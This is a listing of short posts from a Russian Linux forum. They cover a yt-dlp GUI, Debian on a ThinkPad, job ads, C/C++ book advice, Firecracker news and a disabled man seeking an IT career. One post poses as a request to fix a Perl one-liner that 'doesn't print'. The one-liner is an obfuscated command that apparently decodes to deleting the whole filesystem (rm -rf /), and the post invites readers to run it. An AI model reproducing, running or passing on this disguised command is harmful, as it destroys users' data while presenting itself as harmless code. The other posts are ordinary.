GUI для yt-dlp
Посоветуйте программу с графическим интерфейсом для скачивания с YouTube. Желательно, чтобы была в Ubuntu, но если такой не существует, то можно и стороннюю.
UPD
Посоветуйте программу с графическим интерфейсом для скачивания с YouTube. Желательно, чтобы была в Ubuntu, но если такой не существует, то можно и стороннюю.
UPD
Имеется в наличии Thinkpad X260, на нем установлен 12 Debian. Задам несколько вопросов, по улучшению:
1. По умолчанию стоят драйвера Mesa Intel(R) HD Graphics 520 (SKL GT2). С которыми наблюдаю мелкие подлагивания курсора и было пара зависаний гуя. Если я поставлю проприеритарные драйвера, то они исправят ситуацию? Если да - то какие ставить?
2. Как настроить именно полное выключение системы? В текущих настройках, я так понимаю идет глубокий сон (кнопка Fn светится, но при этом интуитивно не понятно, как вывести систему ото сна. Потому жму на кнопку включения, пока подсветка не тухнет, а затем включаю снова кнопкой). Либо же в ноутбуках принято делать по другому и выключение системы не желательно?
3. На ноутбуке 2 батареи, внешняя и внутренняя. У обоих ёмкость по 60-61% от изначальной. Это пока терпимо, или желательно поменять их? Если менять, то на что ориентироваться у продавцов? Эти батареи оригинальные.
4. У меня fxce, какой пакет поставить, что бы при переключении раскладки, это отображалось на экране, аналогично отображению в KDE? Пакетов с Qt я и так натащил уже в систему, потому не критично.
помогите, пожалуйста исправить такую программу:
cat "test... test... test..." | perl -e '$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`{;;y; -/:-@[-`{-};`-{/" -;;s;;$_;see'
- не печатает
Microsoft опубликовал у себя на сайте курс для начинающих по языку программирования Rust.
Курс доступен на русском языке, состоит из 8 модулей и предлагает следующие пункты схемы обучения:
Есть ли такие? Поделитесь опытом использования, если был.
Интересует простой язык (с сахаром) для встраивания в приложения на C/C++, в т.ч. для ГУИ.
Здорово, если статическая типизация была бы опциональной.
Посоветуйте, пожалуйста, книгу или статью об особенностях Си, с помощью которой можно было бы дополнить уже имеющиеся знания о языке
Оклад от 100к
Компания ARRIVAL создает современный коммерческий электрический транспорт таким, каким он должен быть: доступным, элегантным, тихим и безопасным. Одна из наших основных задач - разработать электрический автомобиль, который будет стоить не дороже аналогичного автомобиля с бензиновым двигателем как по цене покупки, так и по стоимости владения. Чтобы этого достичь, мы стараемся оптимизировать каждый этап его создания - от проектирования, разработки всех компонент, используемых материалов и до программного обеспечения. Программное обеспечение автомобиля (от контроллеров движения до систем искусственного интеллекта), а также сопутствующие сервисы мы разрабатываем в Санкт-Петербурге, автомобили собираются в Банбери (Англия).
Мы ищем опытного разработчика ПО для автомобильного применения.
Обязанности:
Требования и пожелания:
Условия:
Резюме прислайте на pripoten@arrival.com
Кто посещал? Есть ли смысл или все это ерунда?
Владыка Зимы теряет свои силы. И пока он отступает в более холодные страны, чтобы переждать и прийти в себя - природа и все живое пробуждается и обновляется! А вместе с ней обновляется и GOG. Помимо традиционной весенней распродажи со скидками до 90% - GOG представляет облачные сохранения для более 100 игр DosBox. И это только начало!
( читать дальше... )
>>> Подробности
Помогите, пожалуйста. В свои 22 года я стал инвалидом 2 группы и потерял все. Жизнь резко изменилось, и теперь у меня нет возможности заниматься тем, чем я жил раньше. Вынужден менять профессию, да вообще всю жизнь на 180 градусов. Все потеряно. Привязан к дому — никуда не выхожу. Появилась сильная апатия и отвращение к самому себе. Все время ушло впустую, а планы разрушились. Я потерял желание жить. Нужно срочно что-то делать. Исторически сложилось так, что я интроверт и автономный самодостаточный человек: у меня нет друзей, девушки, детей. Живу один. Если кому интересно, нахожусь в СПб (г. Санкт-Петербург).
Учитывая, что все мои планы разрушены и жизнь резко изменилась, нужно менять профессию. К счастью, я интересуюсь информационными технологиями и даже что-то знаю, хоть и на уровне чуть выше обывательского. Ближайшее время буду нищебродствовать, а также набираться новых знаний и опыта в IT. Могу уделять этому от 5 до 9 часов в сутки (без перерывов) — до тех пор, пока не смогу найти работу. Будет сложно, учитывая состоятение моего здоровья. Реально опыта работы в IT нет вообще.
Давно интересуюсь open source и Linux и еще в 13 лет перешел на Linux (сейчас у меня PureOS на десктопе, Debian на ноуте и Replicant на смарте). Чем я занимался в свободное время? Собирал и чинил компьютеры, хостил игровые серверы/интернет-радио/мыло+джаббер, следил за новостями в IT — это все было чисто хобби, а не профессиональная деятельность. Математику учил только в школе, да и ту помню только на уровне 8 класса. Нужно подтянуть? Если да, то до какого уровня? К счастью, с логикой все в порядке: хорошо изучил формальную логику в свое время, а также интересовался лингвистикой.
Реально ли инвалиду, который привязан к дому, найти удаленную работу в сфере программирования? Интересуют больше операционные системы и их ядра, а также сети (C, C++). Можно enterprise (только Java). Меньше всего хотелось бы связываться с вебом, железками и микросервисами. В любом случае, развиваться буду только в одном направлении (специализации).
Учиться придется самостоятельно по различным учебникам. Неплохо было бы влиться в сообщество программистов моего направления (IRC-чаты, джаббер-каналы, форумы) — что сейчас у программистов популярно? Где брать задачи, чтобы получить реальный опыт для работы? Ко всему прочему у меня серьезные проблемы с речью (грубо говоря, немой), поэтому желательно текстовое общение или готовность получать ответы текстом.
Спасибо за ванимание. Рассчитываю на ваш совет, список литературы, полезные ссылки, лайфхаки и т. п.
Update: Java и enterprise исключаем, а к системному и сетям на сях можно добавить на рассмотрение веб, тогда бекенд.
Перемещено leave из job
Всем привет!
Я ищу нового коллегу нам в Эрливидео писать на C под линукс обработку видео.
Нужно будет:
Работать можно как в Москве в офисе, так и удаленно.
Мы активно работаем с современными инструментами: git, redmine, CI/CD. Так, например, в большинстве проектов принято не давать мержить ветки без прогона тестов, а результат сразу пакуется в deb пакеты для установки.
Команда распределенная, так что много общения проходит в чате.
Всё что мы делаем, мы стараемся максимально быстро донести до клиентов, что бы им побыстрее воспользоваться результатом нашей работы.
Зарплата: 120-170 тыс р, оформление белое по ТК РФ.
Присылайте резюме на hire@flussonic.com
Есть у кого опыт покупки и обслуживания? Раньше был smartbooks.org но они “слились“ в последний год. Интересуют фирмы в РФ.
Перемещено jollheef из development
Спустя почти полгода после прошлого значительного выпуска команда разработчиков представляет новую версию DeltaChat — мессенджера для Android, основанного поверх Email.
( читать дальше... )
>>> Подробности
Подскажите где можно узнать о библиотечных функциях языка си используемых в visual studio? Поясню, что я имею ввиду. У меня есть классическое издание си Г.Шилдта, в нем приведено множество функций разделенных по категориям, но функции предлагаемые к использованию в vs есть частично. Есть ли литература по этим функциям, некий справочник?
Посоветуйте толковые книги на русском/английском по Си++.
Чтобы был нормальный перевод и содержание.
У меня где-то лежит каталог с O'Reilly, надо бы посмотреть среди них. Ещё что-то брал по акции «книга за 1 рубль» в books.ru
В двух словах - я старпёр, который изучал Си/Си++ в 1996-1997 году по книжкам:
* В.В.Подбельский Язык Си++ (Финансы и статистика)
* Беляков М.И., Рабовер Ю.И., Фридман А.Л. Мобильная операционная система
* немного смотрел русский перевод Керниган-Ритчи в бумажном виде в библиотеке когда интернетов не было, а свою книгу купить - стипендия не позволяла
* в 2004-2005 году читал книгу Страуструп Б. Дизайн и эволюция С++
Все эти книги читал в бумажном варианте.
По работе писал только на Си с классами и на Паскале с классами (+Делфи). Сейчас хотел бы по-изучать Си++, чтобы понимать современный код. Какие книги посоветуете? Интересует компактное изложение фундаментальных основ, желательно - на русском языке. Или что-то не очень тяжёлое на английском (чтобы не надо было переводить каждое слово со словариком). Надеюсь, понятно объяснил. Спасибо.
Просто я встретил на днях код вида
A::B::C::D ..., и понял, что пора догонять поезд. На университетских знаниях 20-летней давности сейчас делать почти нечего. Хочу перестать заниматься быдлокодерством, и начать осваивать современные знания.
Ещё - есть ли краткая табличка с основными различиями в стандартах (Comparison table/list)? Или лучше просто прочитать для начала Wikipidia:C++11, и составлять такую таблицу самому?
За что браться не следует однозначно новичку, что освоить для быстрого JFF-эффекта, если хорошо знал в своё время Си с классами? Нравится концепция namespaces. Ещё хотелось бы впоследствии плавный переход на какую-то функциональщину, чтобы знания по современному Си++ пригодились. Какие концепции/подходы есть общие?
Где и как научиться программированию, а не только синтаксису? Вернее, чтобы вообще не стоял вопрос об ЯП. Есть ли признанные книги, курсы? Может есть варианты решения: изучаешь программирование через изучение синтаксиса или наоборот?
Посоветуйте пожалуйста для уровня нуба.
К примеру вот навскидку, что-то из подобного подойдёт?
1. https://www.intuit.ru/studies/courses/3533/775/info
2. https://www.intuit.ru/studies/courses/2193/67/info
3. https://www.intuit.ru/studies/courses/11876/1156/info
Буду благодарен за советы.
P.S. Это не толксы, не нужно тут чсв показывать.
В чем его выгода, где используется и зачем?
Возможно, на ЛОРе, а может быть и нет, кто-то когда-то выложил pdf-ку про функциональное программирование на чистом C. Она была на английском языке и первый пример там был про генератор случайных чисел. Больше ничего я не прочёл. Кто-нибудь ещё её знает? Гугл такие запросы плохо понимает.
Компания Amazon представила новую технологию виртуализации Firecracker, обеспечивающую работу виртуальных машин с минимальными накладными расходами. Платформа предоставляет средства для создания и управления изолированными окружениями и сервисами, построенными с использованием бессерверной модели разработки. Код проекта написан на языке Rust и распространяется под лицензией Apache 2.0.
При запуске с урезанным ядром дополнительный расход памяти по сравнению с контейнером составляет менее 5 Мб. Время с момента запуска microVM до начала выполнения приложения не превышает 125мс. MicroVM могут создаваться с интенсивностью до 150 окружений в секунду. Возможен запуск в виртуальных машинах microVM и обычных окружений на базе штатного ядра Linux (поддерживаются системы с ядром 4.14 и новее).
Нежно люблю linux и чистый Си. Очень хочу связать свое светлое будущее с системным программированием (*nix kernel / C / Assembler). Дико хочу завязать с вебом (Php/JQuery - три года, жутко достало).
Сейчас пишу диплом, 5-й курс. Специальность - информационные системы. Январь-май (пока пишу диплом) готов работать на пол рабочего дня (20 часов в неделю) «за печеньки» с последующим (июнь) удаленным фултайм-трудоустройством у Вас за достойную заработную плату. Вы меня берете сейчас «на вырост», говорите какие книжки читать (все прочту во внерабочее время), даете понятные задания, я задаю глупые вопросы, выполняю ваши задания и за пять месяцев получаете готового специалиста для своей крутой компании.
Ищу работу именно системного программиста на Си. Больше всего интересует доработка ядра, написание модулей к нему. Возможно - разработка консольных (ncurses) утилит. Может быть - программирования разных железяк или embedded-систем. С очень большим интересом отношусь к ассемблеру (сейчас читаю Кнута, там «mixal») - но пока в нём почти ничего не понимаю. Также, с интересом отнесусь к работе с *BSD / Solaris.
Почта (как это сейчас модно)
echo "c29zbm92c2tpZXVnZW5lQGdtYWlsLmNvbQo=" | base64 --decode
Всем: приму любые полезные советы (в плане литературы), что следует прочитать начинающим системщикам, чтобы потом взяли на работу с головой. Ну или с руками.
Ну и вообще, любые советы.
следующие → |